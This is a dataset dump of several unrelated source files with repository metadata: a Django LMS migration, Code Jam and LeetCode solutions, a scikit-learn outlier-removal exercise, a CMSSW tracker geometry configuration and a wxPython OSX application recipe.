6bf4344dab739d65ffab90e5c5672e75c29ea34a | ca384188345d5302c450e8a8c8475e691c1e7e66 | /jm_lms/apps/exercises/migrations/0001_initial.py | b08eebc38ffd6d6b04163b4161e406544cb7f5fb | [] | no_license | EdwardOkech/eDarasa | 8b44154596960ebc9cff8eca481f02eadfff3a9d | 1bd94a4337ebc5519a23e55badb022e65a924601 | refs/heads/master | 2020-03-16T23:32:50.299182 | 2018-05-23T22:51:19 | 2018-05-23T22:51:19 | 133,081,912 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,564 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
    """Initial schema for the exercises app.

    Creates the question models (essay, multiple-choice, list), the answer
    models, Exercise and ExerciseSubmission; the relational fields of the
    essay models are attached afterwards via separate AddField operations.
    """

    dependencies = [
        # The user model is swappable, so depend on whatever AUTH_USER_MODEL is.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='EssayQuestion',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('title', models.TextField(help_text='Exercise Topic Title and description', null=True, verbose_name='Topic Box', blank=True)),
                ('expected_answer', models.TextField(help_text='How the learner should answer the question. Shown after the question has been answered.', null=True, verbose_name=b'Expected Answer', blank=True)),
            ],
            options={
                'verbose_name': 'Essay Question',
                'verbose_name_plural': 'Essay Questions',
            },
        ),
        migrations.CreateModel(
            name='EssayUserAnswer',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('answer', models.TextField(null=True, blank=True)),
                ('answered_on', models.DateTimeField(auto_now_add=True, null=True)),
            ],
        ),
        migrations.CreateModel(
            name='Exercise',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('title', models.CharField(max_length=256, null=True)),
            ],
        ),
        migrations.CreateModel(
            name='ExerciseSubmission',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('date', models.DateTimeField(auto_now_add=True)),
                ('exercise', models.ForeignKey(verbose_name='Exercise', to='exercises.Exercise')),
                ('student', models.ForeignKey(related_name='exercise_submissions', verbose_name=b'The Student', to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'verbose_name': 'Exercise Submission',
                'verbose_name_plural': 'Exercise Submissions',
            },
        ),
        migrations.CreateModel(
            name='MultiChoiceQuestion',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('title', models.TextField(help_text='Exercise Topic Title and description', null=True, verbose_name='Topic Box', blank=True)),
                ('expected_answer', models.TextField(help_text='How the learner should answer the question. Shown after the question has been answered.', null=True, verbose_name=b'Expected Answer', blank=True)),
                ('exercise', models.ForeignKey(verbose_name='Exercise', to='exercises.Exercise')),
                ('forward_to_exercise', models.ManyToManyField(related_name='forwarded_exercises_answers_mc', verbose_name='Forward To Exercise', to='exercises.Exercise', blank=True)),
            ],
            options={
                'verbose_name': 'Multiple Choice Question',
                'verbose_name_plural': 'Multiple Choice Questions',
            },
        ),
        migrations.CreateModel(
            name='MultiChoiceQuestionOption',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('content', models.CharField(help_text='Enter the answer text that you want displayed', max_length=1000, verbose_name='Answer Content')),
                ('correct', models.BooleanField(default=False, help_text='Is this a correct answer?', verbose_name='Correct')),
                ('question', models.ForeignKey(verbose_name='Question', to='exercises.MultiChoiceQuestion')),
            ],
            options={
                'verbose_name': 'MultiChoice Option',
                'verbose_name_plural': 'MultiChoice Options',
            },
        ),
        migrations.CreateModel(
            name='MultiChoiceUserSubmittedAnswer',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('answered_on', models.DateTimeField(auto_now_add=True, null=True)),
                ('exercise_submission', models.ForeignKey(verbose_name='Exercise Submission', blank=True, to='exercises.ExerciseSubmission', null=True)),
                ('question', models.ForeignKey(verbose_name='Question', to='exercises.MultiChoiceQuestion')),
                ('selected_choice', models.ForeignKey(verbose_name='Question', to='exercises.MultiChoiceQuestionOption')),
                ('student', models.ForeignKey(related_name='exercise_submitted_choice', verbose_name=b'The Student', to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'verbose_name': 'MultiChoice Submitted User Answer',
                'verbose_name_plural': 'MultiChoice Submitted User Answers',
            },
        ),
        migrations.CreateModel(
            name='Question',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('title', models.TextField(help_text='Exercise Topic Title and description', null=True, verbose_name='Topic Box', blank=True)),
                ('expected_answer', models.TextField(help_text='How the learner should answer the question. Shown after the question has been answered.', null=True, verbose_name=b'Expected Answer', blank=True)),
                ('num_of_expected_answers', models.IntegerField(default=1, verbose_name='Number of expected answers')),
                ('exercise', models.ForeignKey(verbose_name='Exercise', to='exercises.Exercise')),
                ('forward_to_exercise', models.ManyToManyField(related_name='forwarded_exercises_answers', verbose_name='Forward To Exercise', to='exercises.Exercise', blank=True)),
            ],
            options={
                'verbose_name': 'List Question',
                'verbose_name_plural': 'List Questions',
            },
        ),
        migrations.CreateModel(
            name='UserAnswer',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('answer', models.CharField(max_length=256, null=True)),
                ('answered_on', models.DateTimeField(auto_now_add=True, null=True)),
                ('exercise_submission', models.ForeignKey(verbose_name='Exercise Submission', blank=True, to='exercises.ExerciseSubmission', null=True)),
                ('question', models.ForeignKey(verbose_name='Question', to='exercises.Question')),
                ('student', models.ForeignKey(related_name='exercise_answers', verbose_name=b'The Student', to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'ordering': ('id',),
                'verbose_name': 'User Answer to List Question',
                'verbose_name_plural': 'User Answers to List Question',
            },
        ),
        # Relational fields of the essay models, added after the models they
        # reference exist.
        migrations.AddField(
            model_name='essayuseranswer',
            name='exercise_submission',
            field=models.ForeignKey(verbose_name='Exercise Submission', blank=True, to='exercises.ExerciseSubmission', null=True),
        ),
        migrations.AddField(
            model_name='essayuseranswer',
            name='question',
            field=models.ForeignKey(verbose_name='Question', to='exercises.EssayQuestion'),
        ),
        migrations.AddField(
            model_name='essayuseranswer',
            name='student',
            field=models.ForeignKey(related_name='exercise_essay_answers', verbose_name=b'The Student', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='essayquestion',
            name='exercise',
            field=models.ForeignKey(verbose_name='Exercise', to='exercises.Exercise'),
        ),
        migrations.AddField(
            model_name='essayquestion',
            name='forward_to_exercise',
            field=models.ManyToManyField(related_name='forwarded_exercises_answers_eq', verbose_name='Forward To Exercise', to='exercises.Exercise', blank=True),
        ),
    ]
| [
"[email protected]"
] | |
b02ee6280076a1a7aba6bf14f701d852d0992453 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_81/296.py | 97a24772277f1a41527323306b74fa44d458e410 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,745 | py | #!/usr/bin/env python
import sys

# Route I/O through files: read problem input from in.txt, write answers to out.txt.
sys.stdin = open('in.txt')
sys.stdout = open('out.txt', 'w')

cases = int(input())
for caseno in range(1, cases+1):
    teams = int(input())
    # table[n][i]: 1 if team n beat team i, 0 if it lost, -1 if they never played.
    table = [[-1 for i in range(teams)] for j in range(teams)]
    for n in range(teams):
        s = input()
        for i in range(teams):
            if s[i] != '.':
                num = int(s[i])
                table[n][i] = num
    # RPI components: wp = winning percentage, owp = opponents' winning
    # percentage, oowp = opponents' opponents' winning percentage.
    wp = [-1 for i in range(teams)]
    owp = [-1 for i in range(teams)]
    oowp = [-1 for i in range(teams)]
    for i in range(teams):
        plays = 0
        wins = 0
        for j in table[i]:
            if j >= 0:
                plays += 1
                if j == 1:
                    wins += 1
        wp[i] = wins/plays
    for i in range(teams):
        wps = []
        t = table[i]
        for j in range(teams):
            if t[j] >= 0 and i != j:
                # Opponent j's record, excluding games played against team i.
                plays = 0
                wins = 0
                for k in range(teams):
                    if table[j][k] >= 0 and k != i:
                        plays += 1
                        if table[j][k] == 1:
                            wins += 1
                wps.append(wins/plays)
        total = 0
        for w in wps:
            total += w
        owp[i] = total/(len(wps))
    for i in range(teams):
        owps = []
        for j in range(teams):
            if table[i][j] >= 0 and owp[j] >= 0:
                owps.append(owp[j])
        total = 0
        for j in owps:
            total += j
        assert len(owps) > 0
        oowp[i] = total / len(owps)
    print('Case #' + str(caseno) + ':')
    for i in range(teams):
        # Weighting as specified: 25% WP + 50% OWP + 25% OOWP.
        rpi = 0.25*wp[i] + 0.5*owp[i] + 0.25*oowp[i]
        print(rpi)
"[email protected]"
] | |
69486fbac13fbdae54d2d9ea6909759c410de0e9 | 9252e8a6a0a042dcbf52ea744df8e708a83293ba | /Easy/Cells_with_Odd_Values_in_a_Matrix/Cells_with_Odd_Values_in_a_Matrix_optimized.py | 53e96db1c231c792b39b89d5cad25ccb7fa500ec | [
"MIT"
] | permissive | nitin3685/LeetCode_Solutions | e50a40b8202154d9a60ec4ec5f1673042e5c2a50 | ab920e96cd27e0b2c3c895ce20853edceef0cce8 | refs/heads/master | 2020-09-10T16:01:49.202909 | 2020-01-07T06:54:40 | 2020-01-07T06:54:40 | 221,750,419 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 440 | py | #Weird algorithm for matrix multiplication. just addition will produce result matrix
class Solution:
def oddCells(self, n: int, m: int, indices: List[List[int]]) -> int:
row = [0] * n
col = [0] * m
ans = 0
for r,c in indices:
row[r] += 1
col[c] += 1
for i in range(n):
for j in range(m):
ans += (row[i] + col[j] )%2
return ans
| [
"[email protected]"
] | |
38f849d9166e3168b74edf5dba5e77dd822e6d8f | 0c8a267966edd260177106beb04daad8622ba07f | /outliers/outlier_removal_regression.py | 6dacb7e863edc2c7f38226f50ce916c150858399 | [] | no_license | BrianSipple/Machine_Learning | 9665cec5ba9cc94e0dc06db346ddf18cff19d6a6 | f0848183dba64000ff26a32ec45e97531d2bc758 | refs/heads/master | 2021-01-19T00:44:21.123062 | 2015-02-09T04:17:40 | 2015-02-09T04:17:40 | 29,520,532 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,097 | py | #!/usr/bin/python
import random
import numpy
import matplotlib.pyplot as plt
import pickle

from outlier_cleaner import clean_outliers

### load up some practice data with outliers in it
ages = pickle.load( open("practice_outliers_ages.pkl", "r") )
net_worths = pickle.load( open("practice_outliers_net_worths.pkl", "r") )

### ages and net_worths need to be reshaped into 2D numpy arrays
### second argument of reshape command is a tuple of integers: (n_rows, n_columns)
### by convention, n_rows is the number of data points
### and n_columns is the number of features
ages = numpy.reshape( numpy.array(ages), (len(ages), 1))
net_worths = numpy.reshape( numpy.array(net_worths), (len(net_worths), 1))

from sklearn.cross_validation import train_test_split
ages_train, ages_test, net_worths_train, net_worths_test = train_test_split(ages, net_worths, test_size=0.1, random_state=42)

### fill in a regression here! Name the regression object reg so that
### the plotting code below works, and you can see what your regression looks like
from sklearn.linear_model import LinearRegression
reg = LinearRegression()
reg.fit(ages_train, net_worths_train)
# Python 2 print statements; slope is the single regression coefficient.
print "Initial slope: {}".format(reg.coef_[0])
print "Initial r-square: {}".format(reg.score(ages_test, net_worths_test))

try:
    plt.plot(ages, reg.predict(ages), color="blue")
except NameError:
    pass
plt.scatter(ages, net_worths)
plt.show()

### identify and remove the most outlier-y points
try:
    cleaned_data = clean_outliers(
        reg.predict(ages_train),
        ages_train,
        net_worths_train
    )
except NameError as e:
    # NOTE(review): if this branch runs, cleaned_data is never bound, so the
    # len(cleaned_data) check below would raise NameError itself.
    print e
    print "your regression object doesn't exist, or isn't name reg"
    print "can't make predictions to use in identifying outliers"

### only run this code if clean_outliers is returning data
if len(cleaned_data) > 0:
    new_ages, new_net_worths, errors = zip(*cleaned_data)
    new_ages = numpy.reshape( numpy.array(new_ages), (len(new_ages), 1))
    new_net_worths = numpy.reshape( numpy.array(new_net_worths), (len(new_net_worths), 1))

    ### refit your cleaned data!
    try:
        reg.fit(new_ages, new_net_worths)
        plt.plot(new_ages, reg.predict(new_ages), color="green")
    except NameError:
        print "you don't seem to have regression imported/created,"
        print " or else your regression object isn't named reg"
        print " either way, only draw the scatter plot of the cleaned data"
    plt.scatter(new_ages, new_net_worths)
    plt.xlabel("Ages after outlier cleaning")
    plt.ylabel("Net worths after outlier cleaning")
    plt.show()

    new_ages_train, new_ages_test, new_net_worths_train, new_net_worths_test = train_test_split(
        new_ages,
        new_net_worths,
        test_size=0.1,
        random_state=42
    )
    #reg.fit(new_ages_train, new_net_worths_train)
    # NOTE(review): scores below reuse the ORIGINAL test split while reg was
    # just refit on the full cleaned data above.
    print "New slope after cleaning: {}".format(reg.coef_[0])
    print "New r-square after cleaning: {}".format(reg.score(ages_test, net_worths_test))
else:
    print "outlierCleaner() is returning an empty list, no refitting to be done"
"[email protected]"
] | |
92a0bb27897639054e7533cddc6acd682423d77c | a5a99f646e371b45974a6fb6ccc06b0a674818f2 | /Geometry/CMSCommonData/python/trackerOnlyGeometryXML_cfi.py | f45cab690a01a80f5eefdb6cab11e640c7b7e4a5 | [
"Apache-2.0"
] | permissive | cms-sw/cmssw | 4ecd2c1105d59c66d385551230542c6615b9ab58 | 19c178740257eb48367778593da55dcad08b7a4f | refs/heads/master | 2023-08-23T21:57:42.491143 | 2023-08-22T20:22:40 | 2023-08-22T20:22:40 | 10,969,551 | 1,006 | 3,696 | Apache-2.0 | 2023-09-14T19:14:28 | 2013-06-26T14:09:07 | C++ | UTF-8 | Python | false | false | 11,280 | py | import FWCore.ParameterSet.Config as cms
# Tracker-only ideal geometry: the CMS detector description pared down to the
# world/mother volumes plus the full silicon tracker (forward pixels, pixel
# barrel, TIB, TID, TOB, TEC), including the sensitive-volume, reco-material
# and production-cut XML.  File order is preserved exactly from the original.
XMLIdealGeometryESSource = cms.ESSource(
    "XMLIdealGeometryESSource",
    geomXMLFiles = cms.vstring(
        # Common materials, rotations and CMS mother volumes.
        'Geometry/CMSCommonData/data/materials.xml',
        'Geometry/CMSCommonData/data/rotations.xml',
        'Geometry/CMSCommonData/data/normal/cmsextent.xml',
        'Geometry/CMSCommonData/data/cms.xml',
        'Geometry/CMSCommonData/data/cmsMother.xml',
        'Geometry/CMSCommonData/data/cmsTracker.xml',
        # Forward pixel detector (plaquettes, panels, blades, disks).
        'Geometry/TrackerCommonData/data/pixfwdMaterials.xml',
        'Geometry/TrackerCommonData/data/pixfwdCommon.xml',
        'Geometry/TrackerCommonData/data/pixfwdPlaq.xml',
        'Geometry/TrackerCommonData/data/pixfwdPlaq1x2.xml',
        'Geometry/TrackerCommonData/data/pixfwdPlaq1x5.xml',
        'Geometry/TrackerCommonData/data/pixfwdPlaq2x3.xml',
        'Geometry/TrackerCommonData/data/pixfwdPlaq2x4.xml',
        'Geometry/TrackerCommonData/data/pixfwdPlaq2x5.xml',
        'Geometry/TrackerCommonData/data/pixfwdPanelBase.xml',
        'Geometry/TrackerCommonData/data/pixfwdPanel.xml',
        'Geometry/TrackerCommonData/data/pixfwdBlade.xml',
        'Geometry/TrackerCommonData/data/pixfwdNipple.xml',
        'Geometry/TrackerCommonData/data/pixfwdDisk.xml',
        'Geometry/TrackerCommonData/data/pixfwdCylinder.xml',
        'Geometry/TrackerCommonData/data/pixfwd.xml',
        # Pixel barrel (ladders and layers).
        'Geometry/TrackerCommonData/data/pixbarmaterial.xml',
        'Geometry/TrackerCommonData/data/pixbarladder.xml',
        'Geometry/TrackerCommonData/data/pixbarladderfull.xml',
        'Geometry/TrackerCommonData/data/pixbarladderhalf.xml',
        'Geometry/TrackerCommonData/data/pixbarlayer.xml',
        'Geometry/TrackerCommonData/data/pixbarlayer0.xml',
        'Geometry/TrackerCommonData/data/pixbarlayer1.xml',
        'Geometry/TrackerCommonData/data/pixbarlayer2.xml',
        'Geometry/TrackerCommonData/data/pixbar.xml',
        # Tracker Inner Barrel (modules, strings, layers).
        'Geometry/TrackerCommonData/data/tibtidcommonmaterial.xml',
        'Geometry/TrackerCommonData/data/tibmaterial.xml',
        'Geometry/TrackerCommonData/data/tibmodpar.xml',
        'Geometry/TrackerCommonData/data/tibmodule0.xml',
        'Geometry/TrackerCommonData/data/tibmodule0a.xml',
        'Geometry/TrackerCommonData/data/tibmodule0b.xml',
        'Geometry/TrackerCommonData/data/tibmodule2.xml',
        'Geometry/TrackerCommonData/data/tibstringpar.xml',
        'Geometry/TrackerCommonData/data/tibstring0ll.xml',
        'Geometry/TrackerCommonData/data/tibstring0lr.xml',
        'Geometry/TrackerCommonData/data/tibstring0ul.xml',
        'Geometry/TrackerCommonData/data/tibstring0ur.xml',
        'Geometry/TrackerCommonData/data/tibstring0.xml',
        'Geometry/TrackerCommonData/data/tibstring1ll.xml',
        'Geometry/TrackerCommonData/data/tibstring1lr.xml',
        'Geometry/TrackerCommonData/data/tibstring1ul.xml',
        'Geometry/TrackerCommonData/data/tibstring1ur.xml',
        'Geometry/TrackerCommonData/data/tibstring1.xml',
        'Geometry/TrackerCommonData/data/tibstring2ll.xml',
        'Geometry/TrackerCommonData/data/tibstring2lr.xml',
        'Geometry/TrackerCommonData/data/tibstring2ul.xml',
        'Geometry/TrackerCommonData/data/tibstring2ur.xml',
        'Geometry/TrackerCommonData/data/tibstring2.xml',
        'Geometry/TrackerCommonData/data/tibstring3ll.xml',
        'Geometry/TrackerCommonData/data/tibstring3lr.xml',
        'Geometry/TrackerCommonData/data/tibstring3ul.xml',
        'Geometry/TrackerCommonData/data/tibstring3ur.xml',
        'Geometry/TrackerCommonData/data/tibstring3.xml',
        'Geometry/TrackerCommonData/data/tiblayerpar.xml',
        'Geometry/TrackerCommonData/data/tiblayer0.xml',
        'Geometry/TrackerCommonData/data/tiblayer1.xml',
        'Geometry/TrackerCommonData/data/tiblayer2.xml',
        'Geometry/TrackerCommonData/data/tiblayer3.xml',
        'Geometry/TrackerCommonData/data/tib.xml',
        # Tracker Inner Disks (modules, rings, forward/backward halves).
        'Geometry/TrackerCommonData/data/tidmaterial.xml',
        'Geometry/TrackerCommonData/data/tidmodpar.xml',
        'Geometry/TrackerCommonData/data/tidmodule0.xml',
        'Geometry/TrackerCommonData/data/tidmodule0r.xml',
        'Geometry/TrackerCommonData/data/tidmodule0l.xml',
        'Geometry/TrackerCommonData/data/tidmodule1.xml',
        'Geometry/TrackerCommonData/data/tidmodule1r.xml',
        'Geometry/TrackerCommonData/data/tidmodule1l.xml',
        'Geometry/TrackerCommonData/data/tidmodule2.xml',
        'Geometry/TrackerCommonData/data/tidringpar.xml',
        'Geometry/TrackerCommonData/data/tidring0.xml',
        'Geometry/TrackerCommonData/data/tidring0f.xml',
        'Geometry/TrackerCommonData/data/tidring0b.xml',
        'Geometry/TrackerCommonData/data/tidring1.xml',
        'Geometry/TrackerCommonData/data/tidring1f.xml',
        'Geometry/TrackerCommonData/data/tidring1b.xml',
        'Geometry/TrackerCommonData/data/tidring2.xml',
        'Geometry/TrackerCommonData/data/tid.xml',
        'Geometry/TrackerCommonData/data/tidf.xml',
        'Geometry/TrackerCommonData/data/tidb.xml',
        'Geometry/TrackerCommonData/data/tibtidservices.xml',
        'Geometry/TrackerCommonData/data/tibtidservicesf.xml',
        'Geometry/TrackerCommonData/data/tibtidservicesb.xml',
        # Tracker Outer Barrel (modules and rods).
        'Geometry/TrackerCommonData/data/tobmaterial.xml',
        'Geometry/TrackerCommonData/data/tobmodpar.xml',
        'Geometry/TrackerCommonData/data/tobmodule0.xml',
        'Geometry/TrackerCommonData/data/tobmodule2.xml',
        'Geometry/TrackerCommonData/data/tobmodule4.xml',
        'Geometry/TrackerCommonData/data/tobrodpar.xml',
        'Geometry/TrackerCommonData/data/tobrod0c.xml',
        'Geometry/TrackerCommonData/data/tobrod0l.xml',
        'Geometry/TrackerCommonData/data/tobrod0h.xml',
        'Geometry/TrackerCommonData/data/tobrod0.xml',
        'Geometry/TrackerCommonData/data/tobrod1l.xml',
        'Geometry/TrackerCommonData/data/tobrod1h.xml',
        'Geometry/TrackerCommonData/data/tobrod1.xml',
        'Geometry/TrackerCommonData/data/tobrod2c.xml',
        'Geometry/TrackerCommonData/data/tobrod2l.xml',
        'Geometry/TrackerCommonData/data/tobrod2h.xml',
        'Geometry/TrackerCommonData/data/tobrod2.xml',
        'Geometry/TrackerCommonData/data/tobrod3l.xml',
        'Geometry/TrackerCommonData/data/tobrod3h.xml',
        'Geometry/TrackerCommonData/data/tobrod3.xml',
        'Geometry/TrackerCommonData/data/tobrod4c.xml',
        'Geometry/TrackerCommonData/data/tobrod4l.xml',
        'Geometry/TrackerCommonData/data/tobrod4h.xml',
        'Geometry/TrackerCommonData/data/tobrod4.xml',
        'Geometry/TrackerCommonData/data/tobrod5l.xml',
        'Geometry/TrackerCommonData/data/tobrod5h.xml',
        'Geometry/TrackerCommonData/data/tobrod5.xml',
        'Geometry/TrackerCommonData/data/tob.xml',
        # Tracker EndCaps (modules, rings, petals, wheels, services).
        'Geometry/TrackerCommonData/data/tecmaterial.xml',
        'Geometry/TrackerCommonData/data/tecmodpar.xml',
        'Geometry/TrackerCommonData/data/tecmodule0.xml',
        'Geometry/TrackerCommonData/data/tecmodule0r.xml',
        'Geometry/TrackerCommonData/data/tecmodule0s.xml',
        'Geometry/TrackerCommonData/data/tecmodule1.xml',
        'Geometry/TrackerCommonData/data/tecmodule1r.xml',
        'Geometry/TrackerCommonData/data/tecmodule1s.xml',
        'Geometry/TrackerCommonData/data/tecmodule2.xml',
        'Geometry/TrackerCommonData/data/tecmodule3.xml',
        'Geometry/TrackerCommonData/data/tecmodule4.xml',
        'Geometry/TrackerCommonData/data/tecmodule4r.xml',
        'Geometry/TrackerCommonData/data/tecmodule4s.xml',
        'Geometry/TrackerCommonData/data/tecmodule5.xml',
        'Geometry/TrackerCommonData/data/tecmodule6.xml',
        'Geometry/TrackerCommonData/data/tecpetpar.xml',
        'Geometry/TrackerCommonData/data/tecring0.xml',
        'Geometry/TrackerCommonData/data/tecring1.xml',
        'Geometry/TrackerCommonData/data/tecring2.xml',
        'Geometry/TrackerCommonData/data/tecring3.xml',
        'Geometry/TrackerCommonData/data/tecring4.xml',
        'Geometry/TrackerCommonData/data/tecring5.xml',
        'Geometry/TrackerCommonData/data/tecring6.xml',
        'Geometry/TrackerCommonData/data/tecring0f.xml',
        'Geometry/TrackerCommonData/data/tecring1f.xml',
        'Geometry/TrackerCommonData/data/tecring2f.xml',
        'Geometry/TrackerCommonData/data/tecring3f.xml',
        'Geometry/TrackerCommonData/data/tecring4f.xml',
        'Geometry/TrackerCommonData/data/tecring5f.xml',
        'Geometry/TrackerCommonData/data/tecring6f.xml',
        'Geometry/TrackerCommonData/data/tecring0b.xml',
        'Geometry/TrackerCommonData/data/tecring1b.xml',
        'Geometry/TrackerCommonData/data/tecring2b.xml',
        'Geometry/TrackerCommonData/data/tecring3b.xml',
        'Geometry/TrackerCommonData/data/tecring4b.xml',
        'Geometry/TrackerCommonData/data/tecring5b.xml',
        'Geometry/TrackerCommonData/data/tecring6b.xml',
        'Geometry/TrackerCommonData/data/tecpetalf.xml',
        'Geometry/TrackerCommonData/data/tecpetalb.xml',
        'Geometry/TrackerCommonData/data/tecpetal0.xml',
        'Geometry/TrackerCommonData/data/tecpetal0f.xml',
        'Geometry/TrackerCommonData/data/tecpetal0b.xml',
        'Geometry/TrackerCommonData/data/tecpetal3.xml',
        'Geometry/TrackerCommonData/data/tecpetal3f.xml',
        'Geometry/TrackerCommonData/data/tecpetal3b.xml',
        'Geometry/TrackerCommonData/data/tecpetal6f.xml',
        'Geometry/TrackerCommonData/data/tecpetal6b.xml',
        'Geometry/TrackerCommonData/data/tecpetal8f.xml',
        'Geometry/TrackerCommonData/data/tecpetal8b.xml',
        'Geometry/TrackerCommonData/data/tecwheel.xml',
        'Geometry/TrackerCommonData/data/tecwheela.xml',
        'Geometry/TrackerCommonData/data/tecwheelb.xml',
        'Geometry/TrackerCommonData/data/tecwheelc.xml',
        'Geometry/TrackerCommonData/data/tecwheeld.xml',
        'Geometry/TrackerCommonData/data/tecwheel6.xml',
        'Geometry/TrackerCommonData/data/tecservices.xml',
        'Geometry/TrackerCommonData/data/tecbackplate.xml',
        'Geometry/TrackerCommonData/data/tec.xml',
        # Top-level tracker assembly and sub-detector placement.
        'Geometry/TrackerCommonData/data/trackermaterial.xml',
        'Geometry/TrackerCommonData/data/tracker.xml',
        'Geometry/TrackerCommonData/data/trackerpixbar.xml',
        'Geometry/TrackerCommonData/data/trackerpixfwd.xml',
        'Geometry/TrackerCommonData/data/trackertib.xml',
        'Geometry/TrackerCommonData/data/trackertid.xml',
        'Geometry/TrackerCommonData/data/trackertibtidservices.xml',
        'Geometry/TrackerCommonData/data/trackertob.xml',
        'Geometry/TrackerCommonData/data/trackertec.xml',
        'Geometry/TrackerCommonData/data/trackerbulkhead.xml',
        'Geometry/TrackerCommonData/data/trackerother.xml',
        'Geometry/TrackerCommonData/data/trackerStructureTopology.xml',
        # Sensitive volumes, reconstruction material and production cuts.
        'Geometry/TrackerSimData/data/trackersens.xml',
        'Geometry/TrackerRecoData/data/trackerRecoMaterial.xml',
        'Geometry/TrackerSimData/data/trackerProdCuts.xml',
    ),
    rootNodeName = cms.string('tracker:Tracker')
)
| [
"[email protected]"
] | |
8a90607f501666c4167d56b1318788ad7de2622b | 112882b8d6c5071e7d2610c595bfca9210c79a0a | /Python/leetcode.059.spiral-matrix-ii.py | e94e966ba8a1993a1e5de4cb00dc0482783c04d3 | [
"MIT"
] | permissive | tedye/leetcode | 193b1900d98e35d5c402013cbe3bc993d0235da2 | 975d7e3b8cb9b6be9e80e07febf4bcf6414acd46 | refs/heads/master | 2021-01-01T19:06:06.408135 | 2015-10-24T06:44:40 | 2015-10-24T06:44:40 | 41,804,923 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,134 | py | class Solution(object):
def generateMatrix(self, n):
"""
:type n: int
:rtype: List[List[int]]
"""
if n <= 0:
return []
if n == 1:
return [[1]]
matrix = [[None] * n for _ in range(n)]
x = y = 0
direction = [(0,1),(1,0),(0,-1),(-1,0)]
count = 1
l = 0
r = n-1
u = 0
d = n-1
dc = 0
while l <= r or u <= d:
if l <= x <= r and u <= y <= d:
matrix[y][x] = count
count += 1
y += direction[dc&3][0]
x += direction[dc&3][1]
elif x > r:
u += 1
x -= 1
y += 1
dc += 1
elif y > d:
r -= 1
y -= 1
x -= 1
dc +=1
elif x < l:
d -= 1
x += 1
y -= 1
dc += 1
elif y < u:
l += 1
y += 1
x += 1
dc += 1
return matrix | [
"[email protected]"
] | |
15900d19d8a64750afdcbbffb1afc39a78fc04ed | 4c8152b5abdefa8fe44cb4a423985b18a3175542 | /Books/wxpython-28-application-development-cookbook/1780_Code/1780_12_Code/05/osxapp.py | b79b77118dfeb20192ff0a56c1e0a769787b40e0 | [] | no_license | mcmoralesr/Learning.Python | c5ed943a1e4eed774c1b626c52c450b48c1062b6 | 8ea6222d260989c6973d9a0cc494ff659a78ade6 | refs/heads/master | 2020-06-28T04:22:53.970613 | 2015-02-12T10:23:28 | 2015-02-12T10:23:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,765 | py | # Chapter 12: Application Infrastructure,
# Building and Managing Applications for Distribution
# Recipe 5: Optimizing for OSX
#
import wx
import sys
class OSXApp(wx.App):
    """wx application object with Mac-specific behavior enabled."""
    def OnInit(self):
        """Create and show the main window; returning True continues startup."""
        # Enable native spell checking and right
        # click menu for Mac TextCtrl's
        if wx.Platform == '__WXMAC__':
            spellcheck = "mac.textcontrol-use-spell-checker"
            wx.SystemOptions.SetOptionInt(spellcheck, 1)
        self.frame = OSXFrame(None,
                              title="Optimize for OSX")
        self.frame.Show()
        return True
    def MacReopenApp(self):
        # wx invokes this when the running app is re-activated (e.g. its
        # OSX dock icon is clicked); bring the existing window forward.
        self.GetTopWindow().Raise()
class OSXFrame(wx.Frame):
    """Main application window"""
    def __init__(self, *args, **kwargs):
        super(OSXFrame, self).__init__(*args, **kwargs)
        # Attributes
        self.textctrl = wx.TextCtrl(self,
                                    style=wx.TE_MULTILINE)
        # Setup Menus
        # Stock IDs (wx.ID_OPEN, wx.ID_EXIT, ...) let wx supply platform
        # labels; on Mac, Exit/Preferences/About are relocated to the app menu.
        mb = wx.MenuBar()
        fmenu = wx.Menu()
        fmenu.Append(wx.ID_OPEN)
        fmenu.Append(wx.ID_EXIT)
        mb.Append(fmenu, "&File")
        emenu = wx.Menu()
        emenu.Append(wx.ID_COPY)
        emenu.Append(wx.ID_PREFERENCES)
        mb.Append(emenu, "&Edit")
        hmenu = wx.Menu()
        hmenu.Append(wx.NewId(), "&Online Help...")
        hmenu.Append(wx.ID_ABOUT, "&About...")
        mb.Append(hmenu, "&Help")
        if wx.Platform == '__WXMAC__':
            # Make sure we don't get duplicate
            # Help menu since we used non standard name
            app = wx.GetApp()
            app.SetMacHelpMenuTitleName("&Help")
        self.SetMenuBar(mb)
        self.SetInitialSize()
if __name__ == '__main__':
    app = OSXApp(False)  # False: don't redirect stdout/stderr to a wx window
    app.MainLoop()
| [
"[email protected]"
] | |
